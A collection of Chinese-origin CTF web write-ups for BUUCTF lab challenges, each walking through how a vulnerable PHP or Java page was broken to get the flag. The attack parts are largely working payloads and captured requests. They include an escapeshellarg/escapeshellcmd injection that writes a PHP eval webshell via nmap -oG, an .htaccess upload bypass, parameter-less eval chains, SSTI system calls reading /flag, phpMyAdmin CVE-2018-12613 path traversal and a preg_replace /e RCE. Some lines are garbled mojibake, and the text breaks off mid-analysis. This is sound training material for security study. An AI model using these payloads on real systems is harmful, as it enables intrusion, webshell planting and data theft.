[强网杯 2019]高明的黑客
Entering the site shows the message:
Geese leave their cry and people leave their name: this site has been hacked
I really admire your company's developers too, so I specially backed up the site source to www.tar.gz for everyone to enjoy
Download www.tar.gz. After extraction there are 3002 php files, but the get/post parameter names inside them are all random. Looking closely at the php files, a large number of paired statements like the following appear:
$_GET['cXjHClMPs'] = ' ';
echo `{$_GET['cXjHClMPs']}`;
We can use url/?cXjHClMPs=cat /flag to find the final answer; a script can be used to discover which parameters are usable:
todo: not finished
[BUUCTF 2018]Online Tool
Opening the page shows the source code:
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
escapeshellarg() and escapeshellcmd()
- The parameter passed in is: 172.17.0.2' -v -d a=1
- After escapeshellarg it becomes '172.17.0.2'\'' -v -d a=1' : the single quote is escaped first, then the left and right parts are wrapped in single quotes so that they join up, i.e. the string is split into three parts around that quote (with single quotes added on both sides).
- After escapeshellcmd it becomes '172.17.0.2'\\'' -v -d a=1\' , because escapeshellcmd escapes \ and the final unpaired quote: http://php.net/manual/zh/function.escapeshellcmd.php
- The command finally executed is curl '172.17.0.2'\\'' -v -d a=1\' . Because the \\ in the middle is now interpreted as a literal \ rather than an escape character, the ' after it is not escaped and pairs with the following ' to form an empty string. So it simplifies to curl 172.17.0.2\ -v -d a=1' , i.e. a request to 172.17.0.2\ with POST data a=1' .
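To make the analysis above concrete, here is an added Python model (not from the original write-up) of escapeshellarg() and escapeshellcmd() as PHP implements them on Linux, followed by a POSIX shlex split that shows what argv the shell actually builds; the host string is the one from the list above, and the chain order is the one index.php uses.

```python
import shlex


def escapeshellarg(arg: str) -> str:
    """Model of PHP escapeshellarg() on Linux: every ' becomes '\\'' and the whole value is single-quoted."""
    return "'" + arg.replace("'", "'\\''") + "'"


# Characters escapeshellcmd() always prefixes with a backslash (PHP manual: &#;`|*?~<>^()[]{}$\, \x0A, \xFF).
_ALWAYS_ESCAPED = set("#&;`|*?~<>^()[]{}$\\\n\xff")


def escapeshellcmd(cmd: str) -> str:
    """Model of PHP escapeshellcmd(): ' and " are escaped only when unpaired, using the
    single pending-partner logic of the C implementation in ext/standard/exec.c."""
    out = []
    pending = None  # index of the quote that closes the most recent opening quote
    for i, c in enumerate(cmd):
        if c in "'\"":
            if pending is None:
                j = cmd.find(c, i + 1)
                if j == -1:
                    out.append("\\")  # no partner anywhere later: escape it
                else:
                    pending = j       # partner exists: both stay bare
            elif cmd[pending] == c:
                pending = None        # this quote is the partner
            else:
                out.append("\\")
        elif c in _ALWAYS_ESCAPED:
            out.append("\\")
        out.append(c)
    return "".join(out)


def argv_after(host: str, chain: tuple) -> list:
    """Apply the escaping functions in order and return the argv a POSIX shell builds for `curl <host>`."""
    s = host
    for f in chain:
        s = f(s)
    return shlex.split("curl " + s)


if __name__ == "__main__":
    host = "172.17.0.2' -v -d a=1"  # the parameter discussed above
    print(escapeshellcmd(escapeshellarg(host)))
    print(argv_after(host, (escapeshellarg, escapeshellcmd)))  # quoting broken: four arguments
    print(argv_after(host, (escapeshellarg,)))                 # escapeshellarg alone: one argument
```

Applying escapeshellarg() alone keeps the whole value as a single argument, which is the safe way to pass one untrusted value; chaining escapeshellcmd() after it is what re-opens the quoting.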
escapeshellarg wraps the parameter in single quotes, so our parameter is interpreted as a plain string. We therefore put single quotes inside the parameter ourselves so that they pair up with the quotes added by escapeshellarg, and our parameter is no longer interpreted as a string. Enter the url:
todo: explain how the -oG here was arrived at.
/?host=' <?php @eval($_POST["password"]);?> -oG shell.php '
The page echoes the directory the file was uploaded to:
you are in sandbox 5458152bd757cd8fd87bdf0712df1bc4Starting Nmap 7.70 ( https://nmap.org ) at 2021-03-28 03:06 UTC Nmap done: 0 IP addresses (0 hosts up) scanned in 2.63 seconds Nmap done: 0 IP addresses (0 hosts up) scanned in 2.63 seconds
In AntSword, right-click in the blank area, add data, and set:
URL address http://d24500ab-c98b-47f9-9e2b-f8d6bbcc77a8.node3.buuoj.cn/5458152bd757cd8fd87bdf0712df1bc4/shell.php
Connection password password
Site note
Encoding UTF8
Connection type PHP
Leave the rest unchanged. The password can be anything, but it must match $_POST["password"].
After connecting, browse the site files; the flag is in the root directory.
References
https://blog.csdn.net/qq_26406447/article/details/100711933
https://blog.csdn.net/weixin_44077544/article/details/102835099
https://mayi077.gitee.io/2020/07/30/BUUCTF-2018-Online-Tool/
https://www.anquanke.com/post/id/107336
https://blog.csdn.net/SKI_12/article/details/61651960
[RoarCTF 2019]Easy Java
todo: scan with dirsearch
With Java Web one should immediately think of WEB-INF, the protected directory of a Java web application. Guess that this challenge is a WEB-INF/web.xml leak. WEB-INF mainly contains the following files or directories:
- /WEB-INF/web.xml : the web application configuration file, describing the servlets and other application components, their configuration and naming rules.
- /WEB-INF/classes/ : contains all class files used by the site, servlet classes and non-servlet classes alike; these are the classes not packaged in .jar files.
- /WEB-INF/lib/ : holds the JAR files the web application needs, i.e. jars required only by this application, such as database driver jars.
- /WEB-INF/src/ : the source directory, with the java files laid out by package name.
- /WEB-INF/database.properties : the database configuration file.
Detection and exploitation: locate the web.xml file, infer the path of the class files from it, fetch the class file directly, then decompile it to obtain the site source.
´ò¿ªÍøÒ³,·¢ÏֵǽҳÃæ,°´F12·¢ÏÖ:
<center><p><a href="Download?filename=help.docx" target="_blank">help</a></p></center>
Clicking the help link, the page shows:
java.io.FileNotFoundException:{help.docx}
Capture the request made when clicking the help link with Burp Suite:
GET /Download?filename=help.docx HTTP/1.1
Host: 80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn/Login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6
Cookie: JSESSIONID=85BC2CB679CEB4E9E06E4AB50565EEA6
Connection: close
Change GET to POST (this is hard to think of):
POST /Download HTTP/1.1
Host: 80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn/Login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6
Cookie: JSESSIONID=85BC2CB679CEB4E9E06E4AB50565EEA6
Connection: close
Content-Length: 18
filename=help.docx
Response:
HTTP/1.1 500 Internal Server Error
Server: openresty
Date: Sun, 28 Mar 2021 03:53:42 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1585
Connection: close
Content-Disposition: attachment;filename=null
Content-Language: en
<!doctype html><html lang="en"><head><title>HTTP Status 500 – Internal Server Error</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 500 – Internal Server Error</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Description</b> The server encountered an unexpected condition that prevented it from fulfilling the request.</p><p><b>Exception</b></p><pre>java.lang.NullPointerException
java.io.FileInputStream.<init>(FileInputStream.java:130)
java.io.FileInputStream.<init>(FileInputStream.java:93)
com.wm.ctf.DownloadController.doPost(DownloadController.java:24)
javax.servlet.http.HttpServlet.service(HttpServlet.java:661)
javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
</pre><p><b>Note</b> The full stack trace of the root cause is available in the server logs.</p><hr class="line" /><h3>Apache Tomcat/8.5.24</h3></body></html>
Change the request to:
POST /Download?filename=WEB-INF/web.xml HTTP/1.1
Host: 80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn/Login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6
Cookie: JSESSIONID=85BC2CB679CEB4E9E06E4AB50565EEA6
Connection: close
Content-Length: 0
Response:
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 28 Mar 2021 03:50:14 GMT
Content-Type: application/xml
Content-Length: 1562
Connection: close
Content-Disposition: attachment;filename=WEB-INF/web.xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
<welcome-file-list>
<welcome-file>Index</welcome-file>
</welcome-file-list>
<servlet>
<servlet-name>IndexController</servlet-name>
<servlet-class>com.wm.ctf.IndexController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>IndexController</servlet-name>
<url-pattern>/Index</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>LoginController</servlet-name>
<servlet-class>com.wm.ctf.LoginController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>LoginController</servlet-name>
<url-pattern>/Login</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>DownloadController</servlet-name>
<servlet-class>com.wm.ctf.DownloadController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadController</servlet-name>
<url-pattern>/Download</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>FlagController</servlet-name>
<servlet-class>com.wm.ctf.FlagController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>FlagController</servlet-name>
<url-pattern>/Flag</url-pattern>
</servlet-mapping>
</web-app>
Change the request to:
POST /Download?filename=WEB-INF/classes/com/wm/ctf/FlagController.class HTTP/1.1
Host: 80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://80a6988f-e2c9-4a88-aa9c-ac8b56ce9059.node3.buuoj.cn/Login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6
Cookie: JSESSIONID=85BC2CB679CEB4E9E06E4AB50565EEA6
Connection: close
Content-Length: 0
Base64-decode the page content to get the flag.
References
https://www.jianshu.com/p/cb7cbede3b37
https://www.cnblogs.com/Cl0ud/p/12177085.html
[GXYCTF2019]BabyUpload
Opening the page, it is a file upload challenge. The idea is to upload a .htaccess: create a file .htaccess containing
AddType application/x-httpd-php .png
then upload .htaccess.
Another way to write the .htaccess: add a php handler rule so that any filename containing 1 is parsed as php, <FilesMatch "1"> SetHandler application/x-httpd-php </FilesMatch> , or simply SetHandler application/x-httpd-php ; the file 1.png, for example, would then be executed as php.
The page shows:
That upload type is too flashy!
This means we have to change the file type. When uploading .htaccess, intercept with Burp Suite:
POST / HTTP/1.1
Host: e187f0b7-22f0-4d7b-9ce5-97394f953367.node3.buuoj.cn
Content-Length: 336
Cache-Control: max-age=0
Origin: http://e187f0b7-22f0-4d7b-9ce5-97394f953367.node3.buuoj.cn
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1s7I5ajPkRlstANn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.63
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://e187f0b7-22f0-4d7b-9ce5-97394f953367.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6
Cookie: PHPSESSID=48a1bc67790c6d550409df2da3498f55
Connection: close
------WebKitFormBoundary1s7I5ajPkRlstANn
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: application/octet-stream
AddType application/x-httpd-php .png
------WebKitFormBoundary1s7I5ajPkRlstANn
Content-Disposition: form-data; name="submit"
?????
------WebKitFormBoundary1s7I5ajPkRlstANn--
Change Content-Type: application/octet-stream to Content-Type: image/jpeg ; the upload is then reported as successful. Create the file htaccess.png containing
<?php @eval($_POST["password"]);?>
The upload fails with:
That upload type is too flashy!
This means the file type is wrong. Change Content-Type: image/png to Content-Type: image/jpeg ; after uploading the page says:
Hey, don't try to fool me, that tag is obviously still php
Change the content of htaccess.png to
GIF89a
<script language="php">eval($_POST['shell']);</script>
Change Content-Type: image/png to Content-Type: image/jpeg , then upload; the page echoes the relative path of the uploaded file:
/var/www/html/upload/6c9e4529d0f1b11a10f97e7bdbedfece/htaccess.png succesfully uploaded!
In AntSword, right-click in the blank area, add data, and set:
URL address http://7a5bab3a-9c97-4613-ac15-b875f4590ece.node3.buuoj.cn/upload/45373f6d5ca8e7f31a8b1ab615988658/htaccess.png
Connection password password
Site note
Encoding UTF8
Connection type PHP
Leave the rest unchanged. The password can be anything, but it must match $_POST["password"].
After connecting, browse the site files; the flag is in the root directory.
References
https://www.cnblogs.com/wangtanzhi/p/12323313.html
[GXYCTF2019]禁止套娃
Use GitHack to download index.php; in a python2 environment enter:
python GitHack.py http://15e5a8a8-249b-44d1-93f0-8716f36dd25b.node3.buuoj.cn/.git/
GitHack download address: https://github.com/lijiejie/GitHack
It automatically downloads the index.php source:
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
?>
- A parameter named exp must be passed via GET. If all conditions are met, the content of exp is executed.
- The common pseudo-protocols are filtered, so files cannot be read through a pseudo-protocol.
- (?R) references the current expression, and the ? after it makes the recursive call optional. It only matches functions called without parameters, so only calls of the following form are allowed:
a(b(c()));
a();
Not allowed:
a('123');
- The regex also filters out keywords such as et/na/info, so many functions cannot be used. eval($_GET['exp']); is a typical no-parameter RCE.
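To see exactly what the three checks in index.php admit, here is an added Python model of them (not from the original write-up); a small recursive matcher stands in for PCRE's (?R), which Python's re module lacks. The defensive point it makes is that the shape check still admits arbitrarily nested zero-argument calls, so the gate is a denylist rather than a sandbox.

```python
import re

# The three checks from index.php above, in the order the code applies them.
PROTO_RE = re.compile(r'data://|filter://|php://|phar://', re.I)
KEYWORD_RE = re.compile(r'et|na|info|dec|bin|hex|oct|pi|log', re.I)


def _match_call(s: str, i: int):
    # Match [a-z,_]+\((?R)?\) starting at s[i]; return the end index, or None when it does not match.
    j = i
    while j < len(s) and ('a' <= s[j] <= 'z' or s[j] in ',_'):
        j += 1
    if j == i or j >= len(s) or s[j] != '(':
        return None
    j += 1
    inner = _match_call(s, j)  # the optional single recursion, (?R)?
    if inner is not None:
        j = inner
    if j < len(s) and s[j] == ')':
        return j + 1
    return None


def strip_calls(s: str) -> str:
    # Emulates preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $s): each leftmost match is deleted in one pass.
    out, i = [], 0
    while i < len(s):
        end = _match_call(s, i)
        if end is None:
            out.append(s[i])
            i += 1
        else:
            i = end
    return ''.join(out)


def gate(exp: str) -> str:
    """Return 'eval' when exp would reach @eval(), otherwise the name of the check that stops it."""
    if PROTO_RE.search(exp):
        return 'protocol'
    if strip_calls(exp) != ';':
        return 'shape'  # anything other than nested zero-argument calls followed by ';'
    if KEYWORD_RE.search(exp):
        return 'keyword'
    return 'eval'


if __name__ == '__main__':
    for e in ("print_r(scandir('.'));",
              "print_r(scandir(current(localeconv())));",
              "phpinfo();"):
        print(f'{gate(e):9} {e}')
```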
First we need the files in the current directory. The scandir() function lists the files of a directory, for example:
<?php
print_r(scandir('.'));
?>
Now scandir('.') has to be built from parameter-less functions:
localeconv() returns an array containing local numeric and monetary formatting information, and the first element of that array is . . Enter:
/?exp=print_r(localeconv());
The page shows:
Array ( [decimal_point] => . [thousands_sep] => [int_curr_symbol] => [currency_symbol] => [mon_decimal_point] => [mon_thousands_sep] => [positive_sign] => [negative_sign] => [int_frac_digits] => 127 [frac_digits] => 127 [p_cs_precedes] => 127 [p_sep_by_space] => 127 [n_cs_precedes] => 127 [n_sep_by_space] => 127 [p_sign_posn] => 127 [n_sign_posn] => 127 [grouping] => Array ( ) [mon_grouping] => Array ( ) )
We see that the first element of the array is . .
current() returns the current element of an array, which by default is the first value. pos() is an alias of current() with the same behaviour. One more point to note here:
PHP manual entry for pos():
pos (PHP 4, PHP 5, PHP 7, PHP 8) pos — alias of current(). Description: this function is an alias of current().
PHP manual entry for current():
current (PHP 4, PHP 5, PHP 7, PHP 8) current — return the current element in an array. Description: current( array | object $array) : mixed. Every array has an internal pointer to its "current" element, which is initialised to the first element of the array. Parameters: array, the array to operate on. Return value: current() returns the value of the array element the internal pointer currently points to, without moving the pointer. If the internal pointer points beyond the end of the element list, current() returns false.
See also: end() - set the internal pointer of an array to its last element; key() - fetch a key from an array; each() - return the current key/value pair from an array and advance the array pointer; prev() - rewind the internal array pointer; reset() - set the internal pointer of an array to its first element; next() - advance the internal array pointer.
PHP manual download address:
http://cn2.php.net/get/php_manual_zh.chm/from/this/mirror
∴ current(localeconv()) is always a dot. Enter the url:
/?exp=print_r(scandir(current(localeconv())));
The page shows:
Array ( [0] => . [1] => .. [2] => .git [3] => flag.php [4] => index.php )
Method 1
Use array_reverse() to reverse the array, then next() to move the pointer to the second element. Enter the url:
/?exp=print_r(next(array_reverse(scandir(pos(localeconv())))));
The page shows flag.php; then use show_source() to print the flag file.
Enter the url:
/?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));
Get the flag.
Method 2
array_flip() swaps the keys and values of an array. Enter the url:
/?exp=var_dump(array_flip(scandir(current(localeconv()))));
Here either var_dump() or print_r() works.
The page outputs:
array(5) { ["."]=> int(0) [".."]=> int(1) [".git"]=> int(2) ["flag.php"]=> int(3) ["index.php"]=> int(4) }
array_rand() picks one or more random elements from an array, so refreshing repeatedly keeps returning random elements. In this challenge the array returned by scandir() has only 5 elements, so a few refreshes will produce flag.php. Enter the url:
/?exp=var_dump(array_rand(array_flip(scandir(current(localeconv())))));
Enter the url:
/?exp=show_source(array_rand(array_flip(scandir(current(localeconv())))));
Refresh a few times to get the flag.
Method 3
session_start() tells PHP to use sessions; by default PHP does not start a session on its own.
session_id() returns the current session id, and PHPSESSID allows letters and digits.
So we add PHPSESSID=flag.php to the Cookie and then read the current session id:
?exp=print_r(session_id(session_start()));
Intercept with Burp Suite and build the request:
GET /?exp=print_r(session_id(session_start())); HTTP/1.1
Host: 77965458-4610-428d-a777-71972491d489.node3.buuoj.cn
Cookie: PHPSESSID=flag.php
Note: leave two empty lines after the cookie, otherwise no response is received. Response:
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 03 Apr 2021 06:45:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.6.40
Content-Length: 31
flag在哪里呢?<br>flag.php
It shows flag. Build the request:
GET /?exp=show_source(session_id(session_start())); HTTP/1.1
Host: 77965458-4610-428d-a777-71972491d489.node3.buuoj.cn
cookie: PHPSESSID=flag.php
Get the flag. Note: leave two empty lines after the cookie, otherwise no response is received.
References
https://www.wh1teze.top/articles/2020/02/08/1581153047695.html
https://www.cnblogs.com/wangtanzhi/p/12260986.html
[BJDCTF2020]The mystery of ip
Opening the page and pressing F12 on the hint page reveals a comment:
<!-- Do you know why i know your ip? -->
Opening the flag page shows our ip. We try whether this ip can be controlled, guessing that it is template injection.
X-Forwarded-For has SSTI, so the input can be controlled. Intercept with Burp Suite:
GET /flag.php HTTP/1.1
Host: node3.buuoj.cn:25292
X-forwarded-for: {system("ls")}
Note: leave two empty lines after X-Forwarded-For, otherwise no response is received. Response:
Your IP is : bootstrap
css
flag.php
header.php
hint.php
img
index.php
jquery
libs
templates_c
templates_c
Build the request:
GET /flag.php HTTP/1.1
Host: node3.buuoj.cn:25292
X-forwarded-for: {system("ls /")}
Note: leave two empty lines after X-Forwarded-For, otherwise no response is received. Response:
Your IP is : bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
var
The flag is found. Build the request:
GET /flag.php HTTP/1.1
Host: node3.buuoj.cn:25292
X-forwarded-for: {system("cat /flag")}
Note: leave two empty lines after X-Forwarded-For, otherwise no response is received. Get the flag.
References
https://www.cnblogs.com/wangtanzhi/p/12318630.html
[GWCTF 2019]我有一个数据库
Scan the site with dirsearch; enter:
python dirsearch.py -u http://0cc07639-e850-439b-91da-bc4789d9ed9b.node3.buuoj.cn/ -e * -x 429
The scan finds that phpmyadmin/ is accessible. Enter the url:
/phpmyadmin/
Enter the url:
/phpmyadmin/?target=pdf_pages.php%253f/../../../../../../../../flag
Get the flag. In CVE-2018-12613 the source performs one urldecode, so double url encoding is needed here: %253f decodes twice to ?
Or
/phpmyadmin/?target=db_datadict.php%3f/../../../../../../../../flag
Ò²¿ÉÒԵõ½flag¡£
»òÕß
/phpmyadmin/?target=db_sql.php%253f/../../../../../../../../flag
References
https://mayi077.gitee.io/2020/02/29/GWCTF-2019-我有一个数据库/
https://blog.csdn.net/rfrder/article/details/109684292
https://blog.csdn.net/hclimg/article/details/102783871
https://da4er.top/代码审计-phpmyadmin4-8-1后台文件包含漏洞-CVE-2018-12613.html
[BJDCTF2020]Mark loves cat
Scan the site with dirsearch and find a .git leak; download it with GitHack (the download may fail here, try both with and without a proxy). The source:
<?php
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';
foreach($_POST as $x => $y){
    $$x = $y;
}
foreach($_GET as $x => $y){
    $$x = $$y;
}
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
    exit($is);
}
echo "the flag is: ".$flag;
Enter the url:
/?yds=flag
Get the flag. We sent a GET request; the full link is:
http://a1264355-5edf-4c7c-a6fc-e8f62b8e1b22.node3.buuoj.cn/?yds=flag
Entering the code:
foreach($_POST as $x => $y){
    $$x = $y;
}
is not executed, because we sent no POST request. Then the second block:
foreach($_GET as $x => $y){
    $$x = $$y;
}
extracts the key/value pair: yds is assigned to $x and flag to $y, so $$x=$yds and $$y=$flag, and after it runs we have $yds=$flag. Next:
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}
is not executed, because the if condition does not hold. Then:
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}
The condition is satisfied, so $yds, which is now $flag, is output. That is how we get the flag. From the PHP manual:
exit (PHP 4, PHP 5, PHP 7, PHP 8) exit — output a message and terminate the current script
So exit can print content.
References
https://www.codenong.com/cs105925473/
https://blog.csdn.net/jianpanliu/article/details/107028582
[BJDCTF2020]ZJCTF,不过如此
DATA URI Scheme
data:①[<mime type>]②[;charset=<charset>]③[;<encoding>]④,<encoded data>⑤
① data : the scheme name
② [<mime type>] optional, the data type (image/png, text/plain, etc.)
③ [;charset=<charset>] optional, the character set of the source text
④ [;<encoding>] the data encoding (two kinds: US-ASCII by default, or BASE64)
⑤ ,<encoded data> the encoded data
Note:
- The default of [<mime type>][;charset=<charset>] is the value of the Content-Type field in the HTTP header.
- The default of [;<encoding>] is US-ASCII, meaning each character is encoded in the form %xx.
- [;charset=<charset>] has no effect in IE, where the encoding must be set via charset; in Chrome it is the reverse, the charset attribute has no effect and [;charset=<charset>] must be used; in FF both ways work.
- If ,<encoded data> is not data encoded in the [;<encoding>] way, an error is raised.
References
https://www.cnblogs.com/fsjohnhuang/p/3903688.html
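An added Python parser (not from the original write-up) for the data URI layout described above, accepting both the RFC 2397 form data:... and PHP's stream form data://..., decoding the %xx default encoding and base64, and raising on a payload that does not match the declared encoding; the text/plain default for a missing mime type is RFC 2397's, not something the page states.

```python
import base64
import binascii
from urllib.parse import unquote_to_bytes


def parse_data_uri(uri: str) -> dict:
    """Parse data:[<mime type>][;charset=<charset>][;<encoding>],<encoded data> and decode the payload."""
    if uri.startswith('data://'):      # PHP stream-wrapper spelling
        rest = uri[len('data://'):]
    elif uri.startswith('data:'):      # RFC 2397 spelling
        rest = uri[len('data:'):]
    else:
        raise ValueError('not a data URI')
    if ',' not in rest:
        raise ValueError('missing comma before the data')
    header, payload = rest.split(',', 1)
    parts = header.split(';') if header else []
    mime = parts[0] if parts and parts[0] else 'text/plain'  # RFC 2397 default when omitted
    charset = 'US-ASCII'
    encoding = 'url'                   # the default: characters written as %xx escapes
    for p in parts[1:]:
        if p.lower().startswith('charset='):
            charset = p[len('charset='):]
        elif p.lower() == 'base64':
            encoding = 'base64'
        else:
            raise ValueError(f'unknown parameter {p!r}')
    if encoding == 'base64':
        try:
            data = base64.b64decode(payload, validate=True)
        except binascii.Error as exc:
            raise ValueError('payload is not valid base64') from exc
    else:
        data = unquote_to_bytes(payload)
    return {'mime': mime, 'charset': charset, 'encoding': encoding, 'data': data}


if __name__ == '__main__':
    # Both forms used against the challenge below carry the same bytes.
    for u in ('data://text/plain,I have a dream',
              'data://text/plain;base64,SSBoYXZlIGEgZHJlYW0='):
        print(parse_data_uri(u))
```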
Opening the page shows the source:
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }
    include($file);
}
else{
    highlight_file(__FILE__);
}
?>
Two parameters, text and file, are passed via GET. The text parameter is opened read-only with file_get_contents(), and its content must equal the string "I have a dream" before the file inclusion of the $file parameter below is reached. Seeing text opened with file_get_contents() and then a file-include function naturally suggests the data:// pseudo-protocol of PHP.
References
https://blog.csdn.net/weixin_44622228/article/details/105644054
The data protocol is usually used to execute PHP code, but we can also write content into a data URI and let file_get_contents read it. base64 is not required, but it is commonly used to bypass certain filters. Enter:
/?text=data://text/plain,I have a dream
or
/?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=
The page shows:
I have a dream
php://filter is used to read source, php://input to execute php code. Since next.php is a php file, we need the php://filter pseudo-protocol to see its content; try reading next.php base64-encoded.
Enter the url:
/?text=data://text/plain,I have a dream&file=php://filter/read=convert.base64-encode/resource=next.php
The page content, base64-decoded:
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}
function getFlag(){
    @eval($_GET['cmd']);
}
The answer is to enter the url:
/next.php?\S*=${getFlag()}&cmd=system('cat /flag');
Get the flag.
Below is the detailed analysis. The code starts executing from:
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}
The \S*=${getFlag()} passed in the query string becomes $re=\S*, $str=${getFlag()}. Then complex() is called:
function complex($re, $str) {
    return preg_replace(
